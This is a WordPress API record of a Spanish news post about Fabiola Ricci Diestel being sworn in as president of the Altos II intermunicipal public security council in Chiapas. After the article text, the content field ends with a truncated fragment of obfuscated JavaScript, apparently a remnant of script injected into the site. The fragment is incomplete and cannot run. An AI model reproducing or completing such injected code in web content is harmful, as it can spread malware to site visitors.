{"id":22135,"date":"2025-05-29T03:05:17","date_gmt":"2025-05-29T03:05:17","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22135"},"modified":"2025-05-29T03:05:18","modified_gmt":"2025-05-29T03:05:18","slug":"fabiola-ricci-asume-presidencia-del-consejo-intermunicipal-de-seguridad-publica-region-altos-ii","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22135","title":{"rendered":"Fabiola Ricci asume presidencia del Consejo Intermunicipal de Seguridad P\u00fablica Regi\u00f3n Altos II"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"553\" data-id=\"22136\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141221-1024x553.jpg\" alt=\"\" class=\"wp-image-22136\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141221-1024x553.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141221-300x162.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141221-768x415.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141221.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"22137\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141228-1024x682.jpg\" alt=\"\" class=\"wp-image-22137\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141228-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141228-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141228-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141228-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141228.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"612\" data-id=\"22138\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141226-1024x612.jpg\" alt=\"\" class=\"wp-image-22138\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141226-1024x612.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141226-300x179.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141226-768x459.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141226.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"22139\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141224-1024x682.jpg\" alt=\"\" class=\"wp-image-22139\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141224-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141224-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141224-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141224-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141224.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas, 28 de mayo de 2025.- La presidenta municipal de San Crist\u00f3bal, Fabiola Ricci Diestel, tom\u00f3 protesta como presidenta del Consejo Intermunicipal de Seguridad P\u00fablica de la Regi\u00f3n II Altos, en una ceremonia encabezada por el secretario ejecutivo estatal, Jos\u00e9 Domingo Bezares V\u00e1zquez.<\/p>\n\n\n\n<p>Durante la sesi\u00f3n ordinaria, tambi\u00e9n fue designado como secretario ejecutivo del consejo el Lic. \u00d3scar Javier Dom\u00ednguez Guti\u00e9rrez, actual titular del Consejo Municipal de Seguridad P\u00fablica de San Crist\u00f3bal.<\/p>\n\n\n\n<p>Ricci agradeci\u00f3 el respaldo del gobernador Eduardo Ram\u00edrez Aguilar y propuso continuar con operativos interinstitucionales entre mayo y agosto, enfocados en zonas con mayor incidencia delictiva. Adem\u00e1s, llam\u00f3 a los municipios a integrarse activamente a las Mesas de Seguridad.<\/p>\n\n\n\n<p>La edil present\u00f3 el calendario de sesiones 2025 y reiter\u00f3 su compromiso con la paz social y el trabajo coordinado entre los tres niveles de gobierno.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. San Crist\u00f3bal de Las Casas, 28 de mayo de 2025.- La presidenta municipal de San Crist\u00f3bal, Fabiola Ricci Diestel, tom\u00f3 protesta como presidenta del Consejo Intermunicipal de Seguridad P\u00fablica de la Regi\u00f3n II Altos, en una ceremonia encabezada por el secretario ejecutivo estatal, Jos\u00e9 Domingo Bezares V\u00e1zquez. Durante la sesi\u00f3n ordinaria, tambi\u00e9n fue designado &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22138,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-22135","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22135","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22135"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22135\/revisions"}],"predecessor-version":[{"id":22140,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22135\/revisions\/22140"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22138"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22135"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22135"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22135"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}